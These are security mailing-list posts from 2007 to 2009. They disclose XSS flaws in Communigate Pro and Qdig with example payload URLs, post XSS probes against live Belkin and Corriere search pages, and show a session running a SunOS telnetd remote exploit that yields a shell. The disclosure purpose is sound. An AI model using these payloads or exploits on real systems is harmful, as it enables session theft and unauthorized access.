[Full-disclosure] Stored XSS on Communigate Pro 5.2.14 and prior versions
- Description The Communigate Pro webmail framework is prone to a stored Cross Site Scripting vulnerability through crafted plain text email messages. - Affected version: 5.2.14 and prior as reported from Communigate: http://www.communigate.com/cgatepro/History52.html - Details This vulnerability can be exploited if an attacker sends a plain text message to the victim address containing a malicious crafted URL; the internal parser fails to parse the malicious URL and executes Javascript code every time user reads the message. An attacker may be able to use this vulnerability to steal sensitive information from a user's computer (e.g. current SessionID) or force the user's computer to execute stealed operations. - Example of crafted URL http://www.example.com/&z=";>alert(document.cookie)&f= - Patch Install Communigate Pro 5.2.13 5.2.15 15-Jul-2009: * Bug Fix: WebUser: 5.1.2: links in plain text messages could be processed incorrectly. - Communigate http://www.communigate.com/cgatepro/ -- Andrea Purificato http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] informative...
On Wednesday 29 August 2007, Fabio Pietrosanti (naif) wrote: > http://seclists.org/fulldisclosure/2007/Jul/0504.html > comments? Hi Fabio, I fully agree with you, but i have less trouble than you speaking about this type of vulnerability after reporting the XSS to the owner. If nobody replies to me after reasonable time, I consider my work finished and I feel free to talking about anything, in the spirit of full-disclosure. If someone wants to public "0day" XSS without report it to the owner, it's not my problem! Regards, -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] informative...
Il giorno mer, 29/08/2007 alle 09.31 -0400, Fabrizio ha scritto: > And even more informative > > http://www.belkin.com/search/?q=%3cscript%3ealert('XSS')%3c%2fscript% > 3e&sid=1 > [Informative 2] It seems a common practice, otherwise they were warned months ago, but no answer... http://sitesearch.corriere.it/searchresults.jsp?adsEnvironment=corriere&channel_par=corriere&ricerca_par=%22%3Cscript%3Ealert('XSS');%3C/script%3E Bye, -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA
On Monday 02 April 2007 20:12, Gadi Evron wrote: > Not a 0day. Just publicly released exploit code. You're right, sorry for mistakes. I meant "first public exploit". > This is: > 1. Patched. Yes: CPUJan2007 > 2. Not publicly exploitable. Permission grant to public between 9.0.1.x and 10.1.0.x (without CPUJan2007). Thanks for clarification, -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] "0day was the case that they gave me"
Alle 07:00, domenica 11 febbraio 2007, Tyop? ha scritto: > Ok. Someone have a Sol10? (11:10) [EMAIL PROTECTED]:~$ sh test.sh SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ./sunos ./sunos localhost bin (11:11) [EMAIL PROTECTED]:~$ sh test.sh sparclab bunker SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [EMAIL PROTECTED] ALEX ALEX Trying 23.255.212.138... Connected to sparclab. Escape character is '^]'. Last login: Sun Feb 11 11:08:21 from syn Sun Microsystems Inc. SunOS 5.11 snv_49 October 2007 (11:09) [EMAIL PROTECTED]:~$ uname -a; id; SunOS sparclab 5.11 snv_49 sun4u sparc SUNW,Ultra-5_10 uid=100(bunker) gid=1(other) (11:09) [EMAIL PROTECTED]:~$ exit logout Connection closed by foreign host. Absolutely disarming! -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel
Alle 21:54, sabato 10 febbraio 2007, Andrea Purificato - bunker ha scritto: > Version affected: qdig-1.2.9.3, qdig-devel-20060624 Bug fixed by 1.2.9.4 and devel-20070210 Thanks to haganafox for his work, -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel
Qdig - Quick Digital Image Gallery - http://qdig.sourceforge.net/) Version affected: qdig-1.2.9.3, qdig-devel-20060624 Risk: XSS Description: Qdig is an easy-to-use PHP script that dynamically presents your digital image files as an online gallery or set of galleries. Vulnerability: It's vulnerable to XSS (Cross Site Scripting) attack, examples: - /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E - /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E Solution: No solution until author answer. Credits: Andrea "bunker" Purificato - http://rawlab.mindcreations.com Mail copied to the author: haganafox AT sf (no other email found) -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PS Information Leak on HP True64 Alpha OSF1 v5.1 1885
Alle 21:05, martedì 6 febbraio 2007, hai scritto: > I would guess the behavior you just discovered has been > known for a long time. It doesn't mean that things will always be that way :-) See here: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1 > PS: Why should ps to work correctly without the setuid bit? because all recent "ps" works without it, and remove bit from executable is not a workaround in this case. Maybe it's time to abandon the stone age :-) Bye, -- Andrea "bunker" Purificato +++[>++>+> ++<<<-]>.>++.>.<--.>-.<+++. http://rawlab.mindcreations.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/